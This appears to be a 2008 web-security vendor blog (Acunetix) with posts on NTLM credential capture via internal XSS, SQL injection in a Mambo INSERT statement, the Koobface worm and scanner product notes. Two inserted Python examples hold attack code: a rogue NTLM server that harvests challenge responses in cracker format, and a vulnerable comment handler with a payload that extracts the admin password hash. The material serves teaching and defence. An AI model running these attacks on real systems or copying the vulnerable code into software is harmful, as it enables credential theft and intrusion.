November 20, 2008 | Posted by Sandro Gauci | Filed Under Web Security Articles | No Comments
Internal web applications are often excluded from the scrutiny that external ones are subjected to. The assumption is that attackers sit outside the network perimeter and therefore have no access to internal resources, so internal applications are left with common flaws such as Cross Site Scripting and SQL injection.
An attacker inside the network who exploits a vulnerability in an internal web application, or in an external one that internal employees visit frequently, has a number of options. Cross Site Scripting is usually used to steal session cookies, deface websites or inject JavaScript that attempts to exploit browser vulnerabilities. But what if the vulnerable website starts redirecting internal users to a malicious HTTP server on the internal network that answers with a request for NTLM authentication? Browsers configured to log on automatically to intranet sites (the default for Internet Explorer's Local intranet zone) will negotiate NTLM and send the user's credentials to that server without prompting.
What is NTLM? (based on this Wikipedia article)
NTLM (NT LAN Manager, not to be confused with LAN Manager) is a Microsoft authentication protocol best known from the SMB protocol, but also usable over HTTP. MS-CHAP is similar and is used for authentication with Microsoft remote access protocols. During protocol negotiation the internal name is nt lm 0.12; the version number 0.12 has not been explained. NTLM is the successor of LANMAN (Microsoft LAN Manager), an older Microsoft authentication protocol, and attempts to be backwards compatible with it. NTLM was followed by NTLMv2, at which time the original was renamed NTLMv1.
What can an attacker with NTLM credentials do?
These are a few of the ideas:
- Traditionally attackers would feed the captured challenge and response to a password cracker such as Cain & Abel to recover the user's password, and proceed to further attacks from there. Cracking passwords can however be a time-consuming job.
- With newer tools such as Squirtle and Smbrelay3 one no longer needs the password. These tools relay the victim's NTLM authentication, as it happens, to a target server of the attacker's choice and log in there as the victim. The relayed credentials can be used against network shares, IMAP servers, SQL servers and any other service that accepts NTLM authentication.
Very recently Microsoft published a security patch (MS08-068) that mitigates part of the problem. When a victim running the latest patches sends NTLM credentials to an attacker's malicious HTTP server, the attacker can no longer reflect those credentials back onto the victim's own workstation or server. The patch only covers this reflection scenario, so the attack still works when the attacker relays the credentials to a different machine.
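To make the handshake concrete, the following is an added example (written for this page, not code from the original post or from Squirtle/Smbrelay3) that models the rogue internal HTTP server's side of the exchange: it answers the first request with `WWW-Authenticate: NTLM`, returns a Type 2 challenge when the browser sends its Type 1 negotiate message, and pulls the domain, user, workstation and challenge responses out of the Type 3 message the browser sends back, formatting them as a line a cracker accepts. The victim's Type 3 message is constructed inline with dummy response bytes, so no real credentials are involved; the target name `INTRANET` and the user/domain/workstation values are made up for the demo.

```python
import base64
import os
import struct

SIGNATURE = b"NTLMSSP\x00"
NEGOTIATE_UNICODE = 0x00000001
REQUEST_TARGET = 0x00000004
NEGOTIATE_NTLM = 0x00000200
TARGET_TYPE_SERVER = 0x00020000

def _buf(data, offset):
    """NTLM security-buffer descriptor: length, max length, payload offset."""
    return struct.pack("<HHI", len(data), len(data), offset)

def _read_buf(msg, pos):
    length, _maxlen, offset = struct.unpack_from("<HHI", msg, pos)
    return msg[offset:offset + length]

def build_type1():
    """NEGOTIATE message: what a browser sends once it agrees to do NTLM."""
    flags = NEGOTIATE_UNICODE | REQUEST_TARGET | NEGOTIATE_NTLM
    return SIGNATURE + struct.pack("<II", 1, flags) + _buf(b"", 32) + _buf(b"", 32)

def build_type2(server_challenge, target):
    """CHALLENGE message from the rogue server.  The 8-byte challenge is what the
    victim's LM/NT responses are computed against, so the server must remember it."""
    target_b = target.encode("utf-16-le")
    flags = NEGOTIATE_UNICODE | REQUEST_TARGET | NEGOTIATE_NTLM | TARGET_TYPE_SERVER
    return (SIGNATURE + struct.pack("<I", 2) + _buf(target_b, 48)
            + struct.pack("<I", flags) + server_challenge + b"\x00" * 8
            + _buf(b"", 48 + len(target_b)) + target_b)          # empty target info

def build_type3(domain, user, workstation, lm_response, nt_response):
    """AUTHENTICATE message.  Used here only to construct the victim side of the
    demo; a real browser derives the responses from the user's password hash."""
    parts = [lm_response, nt_response, domain.encode("utf-16-le"),
             user.encode("utf-16-le"), workstation.encode("utf-16-le"), b""]
    fields, payload, offset = b"", b"", 64                       # 64-byte fixed header
    for p in parts:
        fields += _buf(p, offset)
        payload += p
        offset += len(p)
    flags = struct.pack("<I", NEGOTIATE_UNICODE | NEGOTIATE_NTLM)
    return SIGNATURE + struct.pack("<I", 3) + fields + flags + payload

def parse_type3(msg):
    """Pull domain, user, workstation and both challenge responses out of a
    Type 3 message (the data an attacker actually wants)."""
    if msg[:8] != SIGNATURE or struct.unpack_from("<I", msg, 8)[0] != 3:
        raise ValueError("not an NTLM AUTHENTICATE message")
    flags = struct.unpack_from("<I", msg, 60)[0]
    enc = "utf-16-le" if flags & NEGOTIATE_UNICODE else "latin-1"  # latin-1 stands in for OEM
    return {"lm_response": _read_buf(msg, 12), "nt_response": _read_buf(msg, 20),
            "domain": _read_buf(msg, 28).decode(enc), "user": _read_buf(msg, 36).decode(enc),
            "workstation": _read_buf(msg, 44).decode(enc)}

def encode_auth(msg):
    return "NTLM " + base64.b64encode(msg).decode("ascii")

def decode_auth(header):
    return base64.b64decode(header[5:])

class RogueNtlmServer:
    """The three-step 401 handshake; each respond() call is one HTTP round trip
    and takes the request's Authorization header (or None)."""

    def __init__(self, target="INTRANET", challenge=None):
        self.target, self.challenge, self.captured = target, challenge, []

    def respond(self, authorization):
        if not authorization or not authorization.startswith("NTLM "):
            return 401, {"WWW-Authenticate": "NTLM"}                    # 1: demand NTLM
        msg = decode_auth(authorization)
        msg_type = struct.unpack_from("<I", msg, 8)[0]
        if msg_type == 1:                                                # 2: send challenge
            if self.challenge is None:
                self.challenge = os.urandom(8)
            return 401, {"WWW-Authenticate": encode_auth(build_type2(self.challenge, self.target))}
        if msg_type == 3:                                                # 3: harvest response
            creds = parse_type3(msg)
            creds["challenge"] = self.challenge
            self.captured.append(creds)
            return 200, {}
        return 400, {}

def to_crack_format(c):
    """John/hashcat NetNTLM line: v1 when the NT response is 24 bytes
    (hashcat -m 5500), otherwise v2 as NTProofStr + blob (hashcat -m 5600)."""
    chal, user, domain = c["challenge"].hex(), c["user"], c["domain"]
    if len(c["nt_response"]) == 24:
        return "%s::%s:%s:%s:%s" % (user, domain, c["lm_response"].hex(), c["nt_response"].hex(), chal)
    return "%s::%s:%s:%s:%s" % (user, domain, chal, c["nt_response"][:16].hex(), c["nt_response"][16:].hex())

if __name__ == "__main__":
    srv = RogueNtlmServer("INTRANET")
    srv.respond(None)                                   # browser: GET /  -> 401 NTLM
    _, hdrs = srv.respond(encode_auth(build_type1()))   # browser: Type 1 -> 401 Type 2
    # Constructed victim reply with dummy responses (no real credentials involved).
    srv.respond(encode_auth(build_type3("CORP", "alice", "WS01", b"\x11" * 24, b"\x22" * 24)))
    print(to_crack_format(srv.captured[0]))
```

Two things worth noticing: the server never needs the user's password, only the challenge it chose and the response that came back, which is exactly the pair a cracker or a relay tool consumes; and the whole exchange happens in three ordinary HTTP requests to a host the browser considers part of the intranet, so nothing in the user's experience looks like a logon.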
What can one do to mitigate this security issue?
From a web application security point of view, it is important to treat internal web applications as part of the attack surface. Cross Site Scripting is not the only way of luring victims into automatically sending their NTLM credentials on an internal network, but it is one of the most effective. Fixing such vulnerabilities in internal web applications therefore helps close this and many other attack vectors that may apply to your organization.
November 18, 2008 | Posted by robert Abela | Filed Under Knowledge Base | No Comments
With Acunetix WVS version 6, Acunetix introduced a Port Scanner and Network Alerts. When scanning a website, a port scan against the web server can be launched (optional) and once open ports are found specific network security tests are launched against the network service running on that port. A full range of tests are available, such as DNS open recursion, DNS cache poisoning, badly configured proxy servers, weak SNMP community strings and much more.
These tests are scripts based on Microsoft Active Scripting technology, so one can easily modify them or write new ones. Acunetix WVS ships with more than 80 network security checks by default; they can be found in [Application Directory]\Data\Scripts\Network.
A full Scripting reference is available here
So start writing your own tests now and let Acunetix know about it, your script might be included in future Acunetix WVS builds!
November 13, 2008 | Posted by Bogdan Calin | Filed Under AcuSensor Technology, Web Security Articles | No Comments
This post shows how Acunetix AcuSensor Technology improves scanning reliability by using sensors placed inside the web application being scanned, and that with this technology one can detect SQL injection in INSERT statements, a class of vulnerability that a typical black box web application scanner cannot find.
While testing AcuSensor Technology on various open source web applications, we found various 0day vulnerabilities.
The following is a real life example of how a SQL injection and a cross site scripting vulnerability were found in Mambo versions 4.6.2 and 4.6.3. Mambo is one of the world's most popular open source content management systems.
In the file comment.php (located in the “components\com_comment” directory), we have the following code:

Screenshot 1 – Code from comment.php
The above code is used to insert user generated comments into the database.
We can see that the 'articleid' parameter is not properly sanitized before being used in the SQL query. This leads to a SQL injection vulnerability in the INSERT statement. The injection can be exploited if magic_quotes_gpc is set to Off.
Another vulnerability is caused by the same input parameter, which is a stored XSS (cross site scripting) vulnerability.
To exploit this, we combined both vulnerabilities and crafted a request whose injected query inserts a comment containing the name and hashed password of the administrator.
The full HTTP request is presented in the screenshot below.

Screenshot 2 – HTTP Request
The application sensors are placed inside the scanned application and rewrite parts of its source code; in particular they wrap the database access functions. In PHP, one of these is mysql_query, which executes an SQL query over the active database connection.
AcuSensor hooks this function and inspects the query string passed to it. Because the sensor sees the statement as it is about to execute, it can tell whether the scanner's probe altered the statement's structure regardless of what the page returns, which makes SQL injection detection reliable.
In the screenshot below you can see the data returned by the sensor: the full SQL query, the filename and line number, and the complete stack trace. Such information helps developers troubleshoot and fix the vulnerability in the shortest time possible.

Screenshot 3 – AcuSensor data (SQL query)
Vulnerabilities like this one are very hard for a typical black box web scanner to detect. An injection in an INSERT statement cannot be found through the usual blind SQL injection techniques, because the INSERT returns no rows and the page content does not change with the injected condition; only time-based payloads leave any black-box signal at all.
Nor can it be detected by looking for SQL error messages, because this page returns none. With error messages disabled, a typical black box web scanner fails.
This kind of vulnerability is found by the AcuSensor Technology in Acunetix Web Vulnerability Scanner version 6 because the sensor observes the query at the point where it is executed, not through the HTTP response.
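The following added example (written for this page; it is neither Mambo's comment.php nor AcuSensor's code) reproduces the shape of the bug and the two ways of looking at it. A toy comment handler pastes an unsanitized `articleid` into an INSERT while swallowing database errors and returning the same message whatever happens, which is the black-box view; a `QuerySensor` class stands in for the in-application hook on the query function and records every statement with the file, line and function that issued it, which is the sensor view. The schema (`users`, `comments`), the handler, the `ACUSENSOR_MARK` probe and the use of SQLite instead of MySQL are all assumptions made for the demo, as is the fact that `articleid` lands in a numeric position so the payload needs no quote characters.

```python
import re
import sqlite3
import traceback

ADMIN_HASH = "5f4dcc3b5aa765d61d8327deb882cf99"  # sample value (MD5 of "password"), constructed for the demo

def make_db():
    """In-memory stand-in for the CMS database; schema is an assumption."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        CREATE TABLE comments(id INTEGER PRIMARY KEY, articleid INTEGER, name TEXT, comment TEXT);
        INSERT INTO users(username, password) VALUES ('admin', '%s');
    """ % ADMIN_HASH)
    return con

class QuerySensor:
    """Stand-in for an in-application sensor: wraps the connection's execute()
    (the mysql_query() hook in the PHP case) and records every statement together
    with the file, line and function that issued it."""

    def __init__(self, con):
        self._con = con
        self.log = []

    def execute(self, sql):
        caller = traceback.extract_stack(limit=2)[0]   # frame that issued the query
        self.log.append({"sql": sql, "file": caller.filename,
                         "line": caller.lineno, "function": caller.name})
        return self._con.execute(sql)

    def query(self, sql):
        return self._con.execute(sql).fetchall()

def post_comment(db, articleid, name, comment):
    """Vulnerable handler: articleid is concatenated into the INSERT unquoted while
    the string fields get magic_quotes-style escaping.  Errors are swallowed and
    the response is identical whatever happened, so a black-box scanner sees nothing."""
    esc = lambda s: s.replace("'", "''")
    sql = ("INSERT INTO comments(articleid, name, comment) VALUES (%s, '%s', '%s')"
           % (articleid, esc(name), esc(comment)))
    try:
        db.execute(sql)
    except sqlite3.Error:
        pass
    return "Thank you, your comment has been posted."

def list_comments(db, articleid):
    return db.query("SELECT name, comment FROM comments WHERE articleid = %d" % articleid)

# Payload that abuses the INSERT: it completes the VALUES list with two sub-selects
# so the admin's name and hash are stored as a comment on article 0, then comments
# out the rest of the original statement.
EXPLOIT = "0,(SELECT username FROM users LIMIT 1),(SELECT password FROM users LIMIT 1))-- "

MARK = "ACUSENSOR_MARK"
_STRING_LITERAL = re.compile(r"'(?:[^']|'')*'")

def strip_string_literals(sql):
    """Blank out single-quoted literals ('' escapes included) so that only text
    that reached the statement outside a string remains."""
    return _STRING_LITERAL.sub("''", sql)

def scan_parameter(sensor, send):
    """Black-box probe plus sensor feedback: send a marker that is harmless inside
    a string literal but becomes SQL syntax if it lands unquoted, then ask the
    sensor whether any executed statement contains it outside a literal.
    Returns the sensor record (query, file, line, function) for the first hit, or None."""
    sensor.log.clear()
    send("1 OR %s=1" % MARK)
    for rec in sensor.log:
        if MARK in strip_string_literals(rec["sql"]):
            return rec
    return None

if __name__ == "__main__":
    db = QuerySensor(make_db())
    print(post_comment(db, "7", "bob", "nice article"))
    print(post_comment(db, EXPLOIT, "x", "y"))          # same response as the benign post...
    print(list_comments(db, 0))                         # ...but the admin hash is now a comment
    print(scan_parameter(db, lambda v: post_comment(db, v, "x", "y")))        # sensor hit
    print(scan_parameter(db, lambda v: post_comment(db, "1", v, "y")))        # None: quoted context
```

The probe is deliberately one that breaks the statement: the database rejects `1 OR ACUSENSOR_MARK=1`, the handler hides the error, and the HTTP response is byte-for-byte the same as for a valid comment. The only evidence is the statement the sensor logged on its way to the database, together with the file, line and function it was issued from, which is the same information the screenshot above shows.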
This SQL injection vulnerability (and others) was reported to the Mambo Foundation and fixed in Mambo version 4.6.4. The fix was announced here.
November 12, 2008 | Posted by Sandro Gauci | Filed Under Web Security News | No Comments
A worm abusing Facebook's messaging system is making the rounds between friends. It consists of an executable, known as Koobface, that runs on the victim's computer and searches it for Facebook cookies. It then uses these cookies to hijack the authenticated session and send a message to all of the victim's friends. The message typically contains a link to a website that tries to infect new victims.
This is not the first worm to use social networking sites for distribution. Social networking sites are the perfect way of distributing worms in the Web 2.0 world: by its nature, social networking is viral, very much like malware, and reaches a large group of people quickly. Earlier worms made use of web application attacks such as Cross Site Scripting (XSS) and Cross Site Request Forgery (CSRF). The more complex and popular social networking sites become, the more likely it is that they are used as a platform to launch malware. Technologies such as Ajax make these sites more useful and easier to use; as a side effect, they also expose the sites to risks that were previously not considered security issues.
For example, Facebook supports online Apps, some of which have been found to hide malicious code. One such App, 'Secret Crush', was discovered spreading in early 2008 and attempted to install adware on victims' computers. Web application vulnerabilities combined with a bit of social engineering can prove to be a very effective weapon in a malware writer's arsenal.
November 11, 2008 | Posted by robert Abela | Filed Under Web Security Articles | No Comments
Many people think they will never be the victim of a hacker attack because they have no valuable data stored online and are therefore nobody's target. This is a wrong presumption: web hacking happens for many more reasons than stealing data.
A hacker can compromise a website to use its bandwidth for transferring illegal content. The company responsible for the web server then pays for the excess bandwidth, and may face legal action because its servers host illegal content.
Many sites are also hacked so that phishing pages can be hosted on the compromised server, and others are hacked to improve another website's search engine ranking by injecting hidden keywords and links.
Most such cases lead to increased expenses and legal action against the company responsible for the hacked web server, even though it is itself a victim.
Read more about such attacks, why they happen and how to prevent them from happening here.
November 6, 2008 | Posted by robert Abela | Filed Under White Papers | No Comments
This white paper shows how Acunetix AcuSensor Technology increases accuracy by combining black box scanning techniques with feedback from sensors placed inside the source code while the source code is executed.
This technology has many advantages: many more vulnerabilities can be found than with a typical black box scanner approach, and when a vulnerability is reported, the report carries more debug information, such as the stack trace, the line of source code that leads to the vulnerability, and much more.
This helps developers and pen testers fix the reported vulnerabilities in a shorter time and understand what led to them. It is also a means of training developers to write more secure code in future web applications.
You can read this whitepaper here
October 29, 2008 | Posted by robert Abela | Filed Under Product News | 1 Comment
We are proud to announce the launch of Acunetix Web Vulnerability Scanner Version 6.
With this latest version, Acunetix is launching the new AcuSensor Technology, which consists of application sensors that allow developers to identify many more vulnerabilities than a traditional web application scanner can. This technology generates fewer false positives, provides more tools, and offers more options for vulnerability tests, setting new standards in web vulnerability scanning.
Read more about Acunetix and Version 6 release in this press release
Check out the FREE Version of Acunetix WVS V6 from here
Download the Acunetix WVS Version6 manual from here
The new features of Version 6 are:
* AcuSensor Technology (Application Sensors) – In addition to identifying more vulnerabilities than a traditional web application scanner with fewer false positives, it indicates exactly where the vulnerability is in your code and reports debug information.
* Blind SQL Injector Tool – Ideal for penetration testers, the Blind SQL Injector is an automated database data extraction tool for manually verifying and further exploring SQL injections found by the scanner. You can read more about this in Chapter 10 of the manual.
* Port Scanner and Network Alerts – Performs a port scan against the web server and, when open ports are found, runs network level security checks against the service running on each port, such as DNS open recursion tests, weak SNMP community strings and many others. These network security tests are fully scriptable: you can edit them from the vulnerability editor and write your own.
We have also achieved some major improvements with Version 6:
* Pause and Resume now available for scanning and crawling sessions.
* Possibility to scan websites protected with NTLMv2 authentication.
* Option to mark an alert as a false positive. The list of false positives can be customized from the application settings.
* The scanner can now generate a list of uncommon HTTP responses, such as Internal Server Error (HTTP 500), server stopped responding, etc.
* Option to configure the scanner to stop if a given number of network errors occur.
* Vulnerabilities can now be located quickly using a filter; previously it was only possible to search.
* The Compare Results tool can now compare Knowledge Base items and lists of open ports.
* A much more flexible scheduler: a specific day can be chosen in a weekly or monthly schedule, and all scanning options can be configured through the scheduler.
Note: In the FREE Version there is no need to configure the AcuSensor Password to scan the test websites as it is hardcoded in the application.
October 24, 2008 | Posted by robert Abela | Filed Under Web Security News | No Comments
Hackers are clearly becoming more sophisticated, not only operating within a close-knit web hacking community of sites and blogs, but now also creating their own automated SQL injection attack tools and making them freely available to the public.
These tools, openly marketed as developed for 'security auditing', help hackers easily recognize potentially vulnerable web sites that can fall victim to mass SQL injection attacks.
Web developers should be asking themselves what to do against this major threat.
Knowing that vulnerable web applications are the target of SQL injection and other web hacking techniques, the logical thing to do is to stay a step ahead of the attackers and prevent these attacks by identifying web application vulnerabilities before they are exploited.
Read how Acunetix Web Vulnerability Scanner helps you prevent these sophisticated attacks on your web applications here.
Read more about the free SQL injection attack tools available to hackers here.
October 22, 2008 | Posted by Bogdan Calin | Filed Under Knowledge Base | No Comments
If you try to run AcuSensor Injector on Windows Server 2008 you will receive the error "Error populating websites, Unknown error (0x80005000)".
AcuSensor Injector uses Active Directory Service Interfaces (ADSI) to build the list of websites and virtual directories. The IIS ADSI provider it relies on is not available by default on Windows Server 2008 (IIS 7).
To solve this problem you need to install the role service named IIS 6 Metabase Compatibility.
To do this, follow these steps:
1. Click Start, and then click Control Panel.
2. Click Programs and Features.
3. Click Turn Windows features on or off.
4. On Roles Summary group, click on Web Server (IIS) role
5. On Roles Services group, click on Add Role Services.
6. Go to Management Tools->IIS 6 Management Compatibility and enable IIS 6 Metabase Compatibility.
7. Click Next and Install.

IIS 6 Metabase Compatibility
October 21, 2008 | Posted by robert Abela | Filed Under Web Security Articles | No Comments
While we depend more and more on web-based technologies, web applications keep growing and offering more functionality every day. That growth brings more complex designs, which often put application security at risk. A malicious user who exploits a vulnerability in your web application can halt your company's operations and cost you money.
Learn more about Web Application security and the risks they bring with them in this article.